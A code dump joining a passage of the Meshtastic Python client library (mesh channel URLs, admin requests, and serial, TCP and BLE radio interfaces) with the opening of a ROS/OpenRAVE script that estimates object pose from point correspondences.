channelSet.settings.append(c.settings)
bytes = channelSet.SerializeToString()
s = base64.urlsafe_b64encode(bytes).decode('ascii')
return f"https://www.meshtastic.org/d/#{s}".replace("=", "")
def setURL(self, url):
"""Set mesh network URL"""
if self.radioConfig == None:
raise Exception("No RadioConfig has been read")
# URLs are of the form https://www.meshtastic.org/d/#{base64_channel_set}
# Split on '/#' to find the base64 encoded channel settings
splitURL = url.split("/#")
b64 = splitURL[-1]
# We normally strip padding to make for a shorter URL, but the python parser doesn't like
# that. So add back any missing padding
# per https://stackoverflow.com/a/9807138
missing_padding = len(b64) % 4
if missing_padding:
b64 += '=' * (4 - missing_padding)
decodedURL = base64.urlsafe_b64decode(b64)
channelSet = apponly_pb2.ChannelSet()
channelSet.ParseFromString(decodedURL)
i = 0
for chs in channelSet.settings:
ch = channel_pb2.Channel()
ch.role = channel_pb2.Channel.Role.PRIMARY if i == 0 else channel_pb2.Channel.Role.SECONDARY
ch.index = i
ch.settings.CopyFrom(chs)
self.channels[ch.index] = ch
self.writeChannel(ch.index)
i = i + 1
def _requestSettings(self):
"""
Done with initial config messages, now send regular MeshPackets to ask for settings
"""
p = admin_pb2.AdminMessage()
p.get_radio_request = True
def onResponse(p):
"""A closure to handle the response packet"""
self.radioConfig = p["decoded"]["admin"]["raw"].get_radio_response
logging.debug("Received radio config, now fetching channels...")
self._requestChannel(0) # now start fetching channels
return self._sendAdmin(p,
wantResponse=True,
onResponse=onResponse)
def _requestChannel(self, channelNum: int):
"""
Done with initial config messages, now send regular MeshPackets to ask for settings
"""
p = admin_pb2.AdminMessage()
p.get_channel_request = channelNum + 1
logging.debug(f"Requesting channel {channelNum}")
def onResponse(p):
"""A closure to handle the response packet"""
c = p["decoded"]["admin"]["raw"].get_channel_response
self.partialChannels.append(c)
logging.debug(f"Received channel {stripnl(c)}")
index = c.index
# for stress testing, we can always download all channels
fastChannelDownload = True
# Once we see a response that has NO settings, assume we are at the end of channels and stop fetching
quitEarly = (
c.role == channel_pb2.Channel.Role.DISABLED) and fastChannelDownload
if quitEarly or index >= self.iface.myInfo.max_channels - 1:
logging.debug("Finished downloading channels")
# Fill the rest of array with DISABLED channels
index += 1
while index < self.iface.myInfo.max_channels:
ch = channel_pb2.Channel()
ch.role = channel_pb2.Channel.Role.DISABLED
ch.index = index
self.partialChannels.append(ch)
index += 1
self.channels = self.partialChannels
# FIXME, the following should only be called after we have settings and channels
self.iface._connected() # Tell everone else we are ready to go
else:
self._requestChannel(index + 1)
return self._sendAdmin(p,
wantResponse=True,
onResponse=onResponse)
def _sendAdmin(self, p: admin_pb2.AdminMessage, wantResponse=False,
onResponse=None):
"""Send an admin message to the specified node (or the local node if destNodeNum is zero)"""
return self.iface.sendData(p, self.nodeNum,
portNum=portnums_pb2.PortNum.ADMIN_APP,
wantAck=True,
wantResponse=wantResponse,
onResponse=onResponse,
channelIndex=self.iface.localNode._getAdminChannelIndex())
class MeshInterface:
"""Interface class for meshtastic devices
Properties:
isConnected
nodes
debugOut
"""
def __init__(self, debugOut=None, noProto=False):
"""Constructor
Keyword Arguments:
noProto -- If True, don't try to run our protocol on the link - just be a dumb serial client.
"""
self.debugOut = debugOut
self.nodes = None # FIXME
self.isConnected = threading.Event()
self.noProto = noProto
self.localNode = Node(self, -1) # We fixup nodenum later
self.myInfo = None # We don't have device info yet
self.responseHandlers = {} # A map from request ID to the handler
self.failure = None # If we've encountered a fatal exception it will be kept here
random.seed() # FIXME, we should not clobber the random seedval here, instead tell user they must call it
self.currentPacketId = random.randint(0, 0xffffffff)
self._startConfig()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
if exc_type is not None and exc_value is not None:
logging.error(
f'An exception of type {exc_type} with value {exc_value} has occurred')
if traceback is not None:
logging.error(f'Traceback: {traceback}')
self.close()
def showInfo(self):
"""Show human readable summary about this object"""
print(self.myInfo)
print("Nodes in mesh:")
for n in self.nodes.values():
print(stripnl(n))
def getNode(self, nodeId):
"""Return a node object which contains device settings and channel info"""
if nodeId == LOCAL_ADDR:
return self.localNode
else:
logging.info("Requesting configuration from remote node (this could take a while)")
n = Node(self, nodeId)
n.requestConfig()
if not n.waitForConfig(maxsecs = 60):
raise Exception("Timed out waiting for node config")
return n
def sendText(self, text: AnyStr,
destinationId=BROADCAST_ADDR,
wantAck=False,
wantResponse=False,
hopLimit=defaultHopLimit,
onResponse=None):
"""Send a utf8 string to some other node, if the node has a display it will also be shown on the device.
Arguments:
text {string} -- The text to send
Keyword Arguments:
destinationId {nodeId or nodeNum} -- where to send this message (default: {BROADCAST_ADDR})
portNum -- the application portnum (similar to IP port numbers) of the destination, see portnums.proto for a list
wantAck -- True if you want the message sent in a reliable manner (with retries and ack/nak provided for delivery)
wantResponse -- True if you want the service on the other side to send an application layer response
Returns the sent packet. The id field will be populated in this packet and can be used to track future message acks/naks.
"""
return self.sendData(text.encode("utf-8"), destinationId,
portNum=portnums_pb2.PortNum.TEXT_MESSAGE_APP,
wantAck=wantAck,
wantResponse=wantResponse,
hopLimit=hopLimit,
onResponse=onResponse)
def sendData(self, data, destinationId=BROADCAST_ADDR,
portNum=portnums_pb2.PortNum.PRIVATE_APP, wantAck=False,
wantResponse=False,
hopLimit=defaultHopLimit,
onResponse=None,
channelIndex=0):
"""Send a data packet to some other node
Keyword Arguments:
data -- the data to send, either as an array of bytes or as a protobuf (which will be automatically serialized to bytes)
destinationId {nodeId or nodeNum} -- where to send this message (default: {BROADCAST_ADDR})
portNum -- the application portnum (similar to IP port numbers) of the destination, see portnums.proto for a list
wantAck -- True if you want the message sent in a reliable manner (with retries and ack/nak provided for delivery)
wantResponse -- True if you want the service on the other side to send an application layer response
onResponse -- A closure of the form funct(packet), that will be called when a response packet arrives (or the transaction is NAKed due to non receipt)
Returns the sent packet. The id field will be populated in this packet and can be used to track future message acks/naks.
"""
if getattr(data, "SerializeToString", None):
logging.debug(f"Serializing protobuf as data: {stripnl(data)}")
data = data.SerializeToString()
if len(data) > mesh_pb2.Constants.DATA_PAYLOAD_LEN:
raise Exception("Data payload too big")
if portNum == portnums_pb2.PortNum.UNKNOWN_APP: # we are now more strict wrt port numbers
raise Exception("A non-zero port number must be specified")
meshPacket = mesh_pb2.MeshPacket()
meshPacket.channel = channelIndex
meshPacket.decoded.payload = data
meshPacket.decoded.portnum = portNum
meshPacket.decoded.want_response = wantResponse
p = self._sendPacket(meshPacket, destinationId,
wantAck=wantAck, hopLimit=hopLimit)
if onResponse is not None:
self._addResponseHandler(p.id, onResponse)
return p
def sendPosition(self, latitude=0.0, longitude=0.0, altitude=0, timeSec=0, destinationId=BROADCAST_ADDR, wantAck=False, wantResponse=False):
"""
Send a position packet to some other node (normally a broadcast)
Also, the device software will notice this packet and use it to automatically set its notion of
the local position.
If timeSec is not specified (recommended), we will use the local machine time.
Returns the sent packet. The id field will be populated in this packet and can be used to track future message acks/naks.
"""
p = mesh_pb2.Position()
if(latitude != 0.0):
p.latitude_i = int(latitude / 1e-7)
if(longitude != 0.0):
p.longitude_i = int(longitude / 1e-7)
if(altitude != 0):
p.altitude = int(altitude)
if timeSec == 0:
timeSec = time.time() # returns unix timestamp in seconds
p.time = int(timeSec)
return self.sendData(p, destinationId,
portNum=portnums_pb2.PortNum.POSITION_APP,
wantAck=wantAck,
wantResponse=wantResponse)
def _addResponseHandler(self, requestId, callback):
self.responseHandlers[requestId] = ResponseHandler(callback)
def _sendPacket(self, meshPacket,
destinationId=BROADCAST_ADDR,
wantAck=False, hopLimit=defaultHopLimit):
"""Send a MeshPacket to the specified node (or if unspecified, broadcast).
You probably don't want this - use sendData instead.
Returns the sent packet. The id field will be populated in this packet and
can be used to track future message acks/naks.
"""
# We allow users to talk to the local node before we've completed the full connection flow...
if(self.myInfo is not None and destinationId != self.myInfo.my_node_num):
self._waitConnected()
toRadio = mesh_pb2.ToRadio()
if destinationId is None:
raise Exception("destinationId must not be None")
elif isinstance(destinationId, int):
nodeNum = destinationId
elif destinationId == BROADCAST_ADDR:
nodeNum = BROADCAST_NUM
elif destinationId == LOCAL_ADDR:
nodeNum = self.myInfo.my_node_num
elif destinationId.startswith("!"): # A simple hex style nodeid - we can parse this without needing the DB
nodeNum = int(destinationId[1:], 16)
else:
node = self.nodes.get(destinationId)
if not node:
raise Exception(f"NodeId {destinationId} not found in DB")
nodeNum = node['num']
meshPacket.to = nodeNum
meshPacket.want_ack = wantAck
meshPacket.hop_limit = hopLimit
# if the user hasn't set an ID for this packet (likely and recommended), we should pick a new unique ID
# so the message can be tracked.
if meshPacket.id == 0:
meshPacket.id = self._generatePacketId()
toRadio.packet.CopyFrom(meshPacket)
#logging.debug(f"Sending packet: {stripnl(meshPacket)}")
self._sendToRadio(toRadio)
return meshPacket
def waitForConfig(self):
"""Block until radio config is received. Returns True if config has been received."""
success = waitForSet(self, attrs=('myInfo', 'nodes')) and self.localNode.waitForConfig()
if not success:
raise Exception("Timed out waiting for interface config")
def getMyNodeInfo(self):
if self.myInfo is None:
return None
return self.nodesByNum.get(self.myInfo.my_node_num)
def getMyUser(self):
nodeInfo = self.getMyNodeInfo()
if nodeInfo is not None:
return nodeInfo.get('user')
return None
def getLongName(self):
user = self.getMyUser()
if user is not None:
return user.get('longName', None)
return None
def getShortName(self):
user = self.getMyUser()
if user is not None:
return user.get('shortName', None)
return None
def _waitConnected(self):
"""Block until the initial node db download is complete, or timeout
and raise an exception"""
if not self.isConnected.wait(5.0): # timeout after 5 seconds
raise Exception("Timed out waiting for connection completion")
# If we failed while connecting, raise the connection to the client
if self.failure:
raise self.failure
def _generatePacketId(self):
"""Get a new unique packet ID"""
if self.currentPacketId is None:
raise Exception("Not connected yet, can not generate packet")
else:
self.currentPacketId = (self.currentPacketId + 1) & 0xffffffff
return self.currentPacketId
def _disconnected(self):
"""Called by subclasses to tell clients this interface has disconnected"""
self.isConnected.clear()
publishingThread.queueWork(lambda: pub.sendMessage(
"meshtastic.connection.lost", interface=self))
def _connected(self):
"""Called by this class to tell clients we are now fully connected to a node
"""
# (because I'm lazy) _connected might be called when remote Node
# objects complete their config reads, don't generate redundant isConnected
# for the local interface
if not self.isConnected.is_set():
self.isConnected.set()
publishingThread.queueWork(lambda: pub.sendMessage(
"meshtastic.connection.established", interface=self))
def _startConfig(self):
"""Start device packets flowing"""
self.myInfo = None
self.nodes = {} # nodes keyed by ID
self.nodesByNum = {} # nodes keyed by nodenum
startConfig = mesh_pb2.ToRadio()
self.configId = random.randint(0, 0xffffffff)
startConfig.want_config_id = self.configId
self._sendToRadio(startConfig)
def _sendToRadio(self, toRadio):
"""Send a ToRadio protobuf to the device"""
if self.noProto:
logging.warn(
f"Not sending packet because protocol use is disabled by noProto")
else:
#logging.debug(f"Sending toRadio: {stripnl(toRadio)}")
self._sendToRadioImpl(toRadio)
def _sendToRadioImpl(self, toRadio):
"""Send a ToRadio protobuf to the device"""
logging.error(f"Subclass must provide toradio: {toRadio}")
def _handleConfigComplete(self):
"""
Done with initial config messages, now send regular MeshPackets to ask for settings and channels
"""
self.localNode.requestConfig()
def _handleFromRadio(self, fromRadioBytes):
"""
Handle a packet that arrived from the radio(update model and publish events)
Called by subclasses."""
fromRadio = mesh_pb2.FromRadio()
fromRadio.ParseFromString(fromRadioBytes)
asDict = google.protobuf.json_format.MessageToDict(fromRadio)
# logging.debug(f"Received from radio: {fromRadio}")
if fromRadio.HasField("my_info"):
self.myInfo = fromRadio.my_info
self.localNode.nodeNum = self.myInfo.my_node_num
logging.debug(f"Received myinfo: {stripnl(fromRadio.my_info)}")
failmsg = None
# Check for app too old
if self.myInfo.min_app_version > OUR_APP_VERSION:
failmsg = "This device needs a newer python client, please \"pip install --upgrade meshtastic\". For more information see https://tinyurl.com/5bjsxu32"
# check for firmware too old
if self.myInfo.max_channels == 0:
failmsg = "This version of meshtastic-python requires device firmware version 1.2 or later. For more information see https://tinyurl.com/5bjsxu32"
if failmsg:
self.failure = Exception(failmsg)
self.isConnected.set() # let waitConnected return this exception
self.close()
elif fromRadio.HasField("node_info"):
node = asDict["nodeInfo"]
try:
self._fixupPosition(node["position"])
except:
logging.debug("Node without position")
logging.debug(f"Received nodeinfo: {node}")
self.nodesByNum[node["num"]] = node
if "user" in node: # Some nodes might not have user/ids assigned yet
self.nodes[node["user"]["id"]] = node
publishingThread.queueWork(lambda: pub.sendMessage("meshtastic.node.updated",
node=node, interface=self))
elif fromRadio.config_complete_id == self.configId:
# we ignore the config_complete_id, it is unneeded for our stream API fromRadio.config_complete_id
logging.debug(f"Config complete ID {self.configId}")
self._handleConfigComplete()
elif fromRadio.HasField("packet"):
self._handlePacketFromRadio(fromRadio.packet)
elif fromRadio.rebooted:
# Tell clients the device went away. Careful not to call the overridden subclass version that closes the serial port
MeshInterface._disconnected(self)
self._startConfig() # redownload the node db etc...
else:
logging.debug("Unexpected FromRadio payload")
def _fixupPosition(self, position):
"""Convert integer lat/lon into floats
Arguments:
position {Position dictionary} -- object ot fix up
"""
if "latitudeI" in position:
position["latitude"] = position["latitudeI"] * 1e-7
if "longitudeI" in position:
position["longitude"] = position["longitudeI"] * 1e-7
def _nodeNumToId(self, num):
"""Map a node node number to a node ID
Arguments:
num {int} -- Node number
Returns:
string -- Node ID
"""
if num == BROADCAST_NUM:
return BROADCAST_ADDR
try:
return self.nodesByNum[num]["user"]["id"]
except:
logging.debug(f"Node {num} not found for fromId")
return None
def _getOrCreateByNum(self, nodeNum):
"""Given a nodenum find the NodeInfo in the DB (or create if necessary)"""
if nodeNum == BROADCAST_NUM:
raise Exception("Can not create/find nodenum by the broadcast num")
if nodeNum in self.nodesByNum:
return self.nodesByNum[nodeNum]
else:
n = {"num": nodeNum} # Create a minimial node db entry
self.nodesByNum[nodeNum] = n
return n
def _handlePacketFromRadio(self, meshPacket):
"""Handle a MeshPacket that just arrived from the radio
Will publish one of the following events:
- meshtastic.receive.text(packet = MeshPacket dictionary)
- meshtastic.receive.position(packet = MeshPacket dictionary)
- meshtastic.receive.user(packet = MeshPacket dictionary)
- meshtastic.receive.data(packet = MeshPacket dictionary)
"""
asDict = google.protobuf.json_format.MessageToDict(meshPacket)
# We normally decompose the payload into a dictionary so that the client
# doesn't need to understand protobufs. But advanced clients might
# want the raw protobuf, so we provide it in "raw"
asDict["raw"] = meshPacket
# from might be missing if the nodenum was zero.
if not "from" in asDict:
asDict["from"] = 0
logging.error(
f"Device returned a packet we sent, ignoring: {stripnl(asDict)}")
return
if not "to" in asDict:
asDict["to"] = 0
# /add fromId and toId fields based on the node ID
try:
asDict["fromId"] = self._nodeNumToId(asDict["from"])
except Exception as ex:
logging.warn(f"Not populating fromId {ex}")
try:
asDict["toId"] = self._nodeNumToId(asDict["to"])
except Exception as ex:
logging.warn(f"Not populating toId {ex}")
# We could provide our objects as DotMaps - which work with . notation or as dictionaries
# asObj = DotMap(asDict)
topic = "meshtastic.receive" # Generic unknown packet type
decoded = asDict["decoded"]
# The default MessageToDict converts byte arrays into base64 strings.
# We don't want that - it messes up data payload. So slam in the correct
# byte array.
decoded["payload"] = meshPacket.decoded.payload
# UNKNOWN_APP is the default protobuf portnum value, and therefore if not set it will not be populated at all
# to make API usage easier, set it to prevent confusion
if not "portnum" in decoded:
decoded["portnum"] = portnums_pb2.PortNum.Name(
portnums_pb2.PortNum.UNKNOWN_APP)
portnum = decoded["portnum"]
topic = f"meshtastic.receive.data.{portnum}"
# decode position protobufs and update nodedb, provide decoded version as "position" in the published msg
# move the following into a 'decoders' API that clients could register?
portNumInt = meshPacket.decoded.portnum # we want portnum as an int
handler = protocols.get(portNumInt)
# The decoded protobuf as a dictionary (if we understand this message)
p = None
if handler is not None:
topic = f"meshtastic.receive.{handler.name}"
# Convert to protobuf if possible
if handler.protobufFactory is not None:
pb = handler.protobufFactory()
pb.ParseFromString(meshPacket.decoded.payload)
p = google.protobuf.json_format.MessageToDict(pb)
asDict["decoded"][handler.name] = p
# Also provide the protobuf raw
asDict["decoded"][handler.name]["raw"] = pb
# Call specialized onReceive if necessary
if handler.onReceive is not None:
handler.onReceive(self, asDict)
# Is this message in response to a request, if so, look for a handler
requestId = decoded.get("requestId")
if requestId is not None:
# We ignore ACK packets, but send NAKs and data responses to the handlers
routing = decoded.get("routing")
isAck = routing is not None and ("errorReason" not in routing)
if not isAck:
# we keep the responseHandler in dict until we get a non ack
handler = self.responseHandlers.pop(requestId, None)
if handler is not None:
handler.callback(asDict)
logging.debug(f"Publishing {topic}: packet={stripnl(asDict)} ")
publishingThread.queueWork(lambda: pub.sendMessage(
topic, packet=asDict, interface=self))
# Our standard BLE characteristics
TORADIO_UUID = "f75c76d2-129e-4dad-a1dd-7866124401e7"
FROMRADIO_UUID = "8ba2bcc2-ee02-4a55-a531-c525c5e454d5"
FROMNUM_UUID = "ed9da18c-a800-4f66-a670-aa7547e34453"
class BLEInterface(MeshInterface):
"""A not quite ready - FIXME - BLE interface to devices"""
def __init__(self, address, debugOut=None):
self.address = address
self.adapter = pygatt.GATTToolBackend() # BGAPIBackend()
self.adapter.start()
logging.debug(f"Connecting to {self.address}")
self.device = self.adapter.connect(address)
logging.debug("Connected to device")
# fromradio = self.device.char_read(FROMRADIO_UUID)
MeshInterface.__init__(self, debugOut=debugOut)
self._readFromRadio() # read the initial responses
def handle_data(handle, data):
self._handleFromRadio(data)
self.device.subscribe(FROMNUM_UUID, callback=handle_data)
def _sendToRadioImpl(self, toRadio):
"""Send a ToRadio protobuf to the device"""
# logging.debug(f"Sending: {stripnl(toRadio)}")
b = toRadio.SerializeToString()
self.device.char_write(TORADIO_UUID, b)
def close(self):
self.adapter.stop()
def _readFromRadio(self):
wasEmpty = False
while not wasEmpty:
b = self.device.char_read(FROMRADIO_UUID)
wasEmpty = len(b) == 0
if not wasEmpty:
self._handleFromRadio(b)
class StreamInterface(MeshInterface):
"""Interface class for meshtastic devices over a stream link (serial, TCP, etc)"""
def __init__(self, debugOut=None, noProto=False, connectNow=True):
"""Constructor, opens a connection to self.stream
Keyword Arguments:
devPath {string} -- A filepath to a device, i.e. /dev/ttyUSB0 (default: {None})
debugOut {stream} -- If a stream is provided, any debug serial output from the device will be emitted to that stream. (default: {None})
Raises:
Exception: [description]
Exception: [description]
"""
if not hasattr(self, 'stream'):
raise Exception(
"StreamInterface is now abstract (to update existing code create SerialInterface instead)")
self._rxBuf = bytes() # empty
self._wantExit = False
# FIXME, figure out why daemon=True causes reader thread to exit too early
self._rxThread = threading.Thread(target=self.__reader, args=())
MeshInterface.__init__(self, debugOut=debugOut, noProto=noProto)
# Start the reader thread after superclass constructor completes init
if connectNow:
self.connect()
if not noProto:
self.waitForConfig()
def connect(self):
"""Connect to our radio
Normally this is called automatically by the constructor, but if you passed in connectNow=False you can manually
start the reading thread later.
"""
# Send some bogus UART characters to force a sleeping device to wake
self._writeBytes(bytes([START1, START1, START1, START1]))
time.sleep(0.1) # wait 100ms to give device time to start running
self._rxThread.start()
if not self.noProto: # Wait for the db download if using the protocol
self._waitConnected()
def _disconnected(self):
"""We override the superclass implementation to close our port"""
MeshInterface._disconnected(self)
logging.debug("Closing our port")
if not self.stream is None:
self.stream.close()
def _writeBytes(self, b):
"""Write an array of bytes to our stream and flush"""
self.stream.write(b)
self.stream.flush()
def _readBytes(self, len):
"""Read an array of bytes from our stream"""
return self.stream.read(len)
def _sendToRadioImpl(self, toRadio):
"""Send a ToRadio protobuf to the device"""
logging.debug(f"Sending: {stripnl(toRadio)}")
b = toRadio.SerializeToString()
bufLen = len(b)
# We convert into a string, because the TCP code doesn't work with byte arrays
header = bytes([START1, START2, (bufLen >> 8) & 0xff, bufLen & 0xff])
self._writeBytes(header + b)
def close(self):
"""Close a connection to the device"""
logging.debug("Closing stream")
# pyserial cancel_read doesn't seem to work, therefore we ask the reader thread to close things for us
self._wantExit = True
if self._rxThread != threading.current_thread():
self._rxThread.join() # wait for it to exit
def __reader(self):
"""The reader thread that reads bytes from our stream"""
empty = bytes()
try:
while not self._wantExit:
# logging.debug("reading character")
b = self._readBytes(1)
# logging.debug("In reader loop")
# logging.debug(f"read returned {b}")
if len(b) > 0:
c = b[0]
ptr = len(self._rxBuf)
# Assume we want to append this byte, fixme use bytearray instead
self._rxBuf = self._rxBuf + b
if ptr == 0: # looking for START1
if c != START1:
self._rxBuf = empty # failed to find start
if self.debugOut != None:
try:
self.debugOut.write(b.decode("utf-8"))
except:
self.debugOut.write('?')
elif ptr == 1: # looking for START2
if c != START2:
self._rxBuf = empty # failed to find start2
elif ptr >= HEADER_LEN: # we've at least got a header
# big endian length follos header
packetlen = (self._rxBuf[2] << 8) + self._rxBuf[3]
if ptr == HEADER_LEN: # we _just_ finished reading the header, validate length
if packetlen > MAX_TO_FROM_RADIO_SIZE:
self._rxBuf = empty # length ws out out bounds, restart
if len(self._rxBuf) != 0 and ptr + 1 == packetlen + HEADER_LEN:
try:
self._handleFromRadio(self._rxBuf[HEADER_LEN:])
except Exception as ex:
logging.error(
f"Error while handling message from radio {ex}")
traceback.print_exc()
self._rxBuf = empty
else:
# logging.debug(f"timeout")
pass
except serial.SerialException as ex:
if not self._wantExit: # We might intentionally get an exception during shutdown
logging.warn(
f"Meshtastic serial port disconnected, disconnecting... {ex}")
except OSError as ex:
if not self._wantExit: # We might intentionally get an exception during shutdown
logging.error(
f"Unexpected OSError, terminating meshtastic reader... {ex}")
except Exception as ex:
logging.error(
f"Unexpected exception, terminating meshtastic reader... {ex}")
finally:
logging.debug("reader is exiting")
self._disconnected()
class SerialInterface(StreamInterface):
"""Interface class for meshtastic devices over a serial link"""
def __init__(self, devPath=None, debugOut=None, noProto=False, connectNow=True):
"""Constructor, opens a connection to a specified serial port, or if unspecified try to
find one Meshtastic device by probing
Keyword Arguments:
devPath {string} -- A filepath to a device, i.e. /dev/ttyUSB0 (default: {None})
debugOut {stream} -- If a stream is provided, any debug serial output from the device will be emitted to that stream. (default: {None})
"""
if devPath is None:
ports = util.findPorts()
if len(ports) == 0:
raise Exception("No Meshtastic devices detected")
elif len(ports) > 1:
raise Exception(
f"Multiple ports detected, you must specify a device, such as {ports[0]}")
else:
devPath = ports[0]
logging.debug(f"Connecting to {devPath}")
# Note: we provide None for port here, because we will be opening it later
self.stream = serial.Serial(
None, 921600, exclusive=True, timeout=0.5)
# rts=False Needed to prevent TBEAMs resetting on OSX, because rts is connected to reset
self.stream.port = devPath
# OS-X/Windows seems to have a bug in its serial driver. It ignores that we asked for no RTSCTS
# control and will always drive RTS either high or low (rather than letting the CP102 leave
# it as an open-collector floating pin). Since it is going to drive it anyways we want to make
# sure it is driven low, so that the TBEAM won't reset
# Linux does this properly, so don't apply this hack (because it makes the reset button not work)
if platform.system() != 'Linux':
self.stream.rts = False
self.stream.open()
StreamInterface.__init__(
self, debugOut=debugOut, noProto=noProto, connectNow=connectNow)
class TCPInterface(StreamInterface):
"""Interface class for meshtastic devices over a TCP link"""
def __init__(self, hostname: AnyStr, debugOut=None, noProto=False, connectNow=True, portNumber=4403):
"""Constructor, opens a connection to a specified IP address/hostname
Keyword Arguments:
hostname {string} -- Hostname/IP address of the device to connect to
"""
logging.debug(f"Connecting to {hostname}")
server_address = (hostname, portNumber)
sock = socket.create_connection(server_address)
# Instead of wrapping as a stream, we use the native socket API
# self.stream = sock.makefile('rw')
self.stream = None
self.socket = sock
StreamInterface.__init__(
self, debugOut=debugOut, noProto=noProto, connectNow=connectNow)
def close(self):
"""Close a connection to the device"""
logging.debug("Closing TCP stream")
# Sometimes the socket read might be blocked in the reader thread. Therefore we force the shutdown by closing
# the socket here
self._wantExit = True
if not self.socket is None:
self.socket.shutdown(socket.SHUT_RDWR)
self.socket.close()
StreamInterface.close(self)
def _writeBytes(self, b):
"""Write an array of bytes to our stream and flush"""
self.socket.send(b)
def _readBytes(self, len):
"""Read an array of bytes from our stream"""
return self.socket.recv(len)
def _onTextReceive(iface, asDict):
"""Special text auto parsing for received messages"""
# We don't throw if the utf8 is invalid in the text message. Instead we just don't populate
# the decoded.data.text and we log an error message. This at least allows some delivery to
# the app and the app can deal with the missing decoded representation.
#
# Usually btw this problem is caused by apps sending binary data but setting the payload type to
# text.
try:
asBytes = asDict["decoded"]["payload"]
asDict["decoded"]["text"] = asBytes.decode("utf-8")
except Exception as ex:
logging.error(f"Malformatted utf8 in text message: {ex}")
def _onPositionReceive(iface, asDict):
"""Special auto parsing for received messages"""
p = asDict["decoded"]["position"]
iface._fixupPosition(p)
# update node DB as needed
iface._getOrCreateByNum(asDict["from"])["position"] = p
def _onNodeInfoReceive(iface, asDict):
"""Special auto parsing for received messages"""
p = asDict["decoded"]["user"]
# decode user protobufs and update nodedb, provide decoded version as "position" in the published msg
# update node DB as needed
n = iface._getOrCreateByNum(asDict["from"])
n["user"] = p
# We now have a node ID, make sure it is uptodate in that table
iface.nodes[p["id"]] = n
"""Well known message payloads can register decoders for automatic protobuf parsing"""
protocols = {
portnums_pb2.PortNum.TEXT_MESSAGE_APP: KnownProtocol("text", onReceive=_onTextReceive),
portnums_pb2.PortNum.POSITION_APP: KnownProtocol("position", mesh_pb2.Position, _onPositionReceive),
portnums_pb2.PortNum.NODEINFO_APP: KnownProtocol("user", mesh_pb2.User, _onNodeInfoReceive),
portnums_pb2.PortNum.ADMIN_APP: KnownProtocol("admin", admin_pb2.AdminMessage),
portnums_pb2.PortNum.ROUTING_APP: KnownProtocol("routing", mesh_pb2.Routing),
portnums_pb2.PortNum.ENVIRONMENTAL_MEASUREMENT_APP: KnownProtocol("environmental", environmental_measurement_pb2.EnvironmentalMeasurement),
portnums_pb2.PortNum.REMOTE_HARDWARE_APP: KnownProtocol(
"remotehw", remote_hardware_pb2.HardwareMessage)
}
|
PoseFromCorrespondences.py
|
#!/usr/bin/env python
#
# Copyright (C) 2009 Rosen Diankov
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import with_statement # for python 2.5
PKG = 'posedetectiondb' # this package name
NAME = 'PoseFromCorrespondences'
import roslib; roslib.load_manifest(PKG)
import os, sys, time, threading, string, struct
from optparse import OptionParser
from numpy import *
import cv, gtk
import rospy, tf
from roslib import rostime
import std_msgs.msg
import posedetection_msgs.msg
import sensor_msgs.msg
import geometry_msgs.msg
from cv_bridge import CvBridge, CvBridgeError
from IterativeClosestPoint import *
import ParseMessages
from openravepy import *
from Tkinter import *
import tkFileDialog
import copy
def FindExtrinsicCameraParams(imagepoints, objectpoints, KK):
""" Use OpenCV to solve for the affine transformation that matches imagepoints to object points
imagepoints - 2xN array
objectpoints - 3xN array
KK - 3x3 array or 4 element array
"""
imagepoints = array(imagepoints,float)
objectpoints = array(objectpoints,float)
if len(KK.shape) == 1:
cvKK = cv.CreateMat(3,3,cv.CV_32FC1)
cvKK[0,0] = KK[0]; cvKK[0,1] = 0; cvKK[0,2] = KK[2];
cvKK[1,0] = 0; cvKK[1,1] = KK[1]; cvKK[1,2] = KK[3];
cvKK[2,0] = 0; cvKK[2,1] = 0; cvKK[2,2] = 1;
else:
cvKK = cv.fromarray(KK)
cvDist = cv.CreateMat(4,1,cv.CV_32FC1)
cvDist[0,0] = 0; cvDist[1,0] = 0; cvDist[2,0] = 0; cvDist[3,0] = 0;
rvec = cv.CreateMat(3,1,cv.CV_32FC1)
tvec = cv.CreateMat(3,1,cv.CV_32FC1)
object_points = cv.CreateMatHeader(3,objectpoints.shape[0],cv.CV_32FC1)
cv.SetData(object_points,struct.pack('f'*(objectpoints.shape[0]*3),*transpose(objectpoints).flat),4*objectpoints.shape[0])
image_points = cv.CreateMatHeader(2,imagepoints.shape[0],cv.CV_32FC1)
cv.SetData(image_points,struct.pack('f'*(imagepoints.shape[0]*2),*transpose(imagepoints).flat),4*imagepoints.shape[0])
cv.FindExtrinsicCameraParams2(object_points,image_points,cvKK,cvDist,rvec,tvec)
T = matrixFromAxisAngle((rvec[0,0],rvec[1,0],rvec[2,0]))
T[0:3,3] = [tvec[0,0],tvec[1,0],tvec[2,0]]
return T
class PoseFromCorrespondences(metaclass.AutoReloader):
"""
Extracts poses from a set of point correspondences
"""
def __init__(self,kinbodyfilename,verboselevel=1,frame_id=None):
self.orenv = Environment()
self.orenv.Load(kinbodyfilename)
self.orbody = self.orenv.GetBodies()[0]
self.orbody.SetTransform(eye(4))
self.trimesh = self.orenv.Triangulate(self.orbody)
self.orenv.SetViewer('qtcoin')
self.eventhandle = self.orenv.GetViewer().RegisterCallback(Viewer.Events.ItemSelection,self.ormousecb)
self.orpoint = None
self.objectpoints = []
self.verboselevel=verboselevel
self.extractionlck = threading.Lock()
self.cvpoint = None
self.Tobjectrel = None
self.imagepoints = []
self.cvwindow = 'ImageDisplay'
cv.NamedWindow(self.cvwindow, cv.CV_WINDOW_AUTOSIZE)
cv.SetMouseCallback(self.cvwindow,self.cvmousecb)
# register keycb with opencv window
self.bridge = CvBridge()
self.doquit = False
self.gui = threading.Thread(target=self.rungui)
self.gui.start()
self.pattern = (eye(4),None)
self.imagemsg = None
self.KK = None
self.image_sub = rospy.Subscriber("image",sensor_msgs.msg.Image,self.imagecb)
self.camerainfo_sub = rospy.Subscriber("camera_info",sensor_msgs.msg.CameraInfo,self.camerainfocb)
self.frame_id = frame_id
if self.frame_id is None:
self.object_sub = rospy.Subscriber("ObjectDetection",posedetection_msgs.msg.ObjectDetection,self.objectcb)
else:
self.tflistener=tf.TransformListener()
self.pub_relpose = rospy.Publisher("RelativePose", geometry_msgs.msg.Pose)
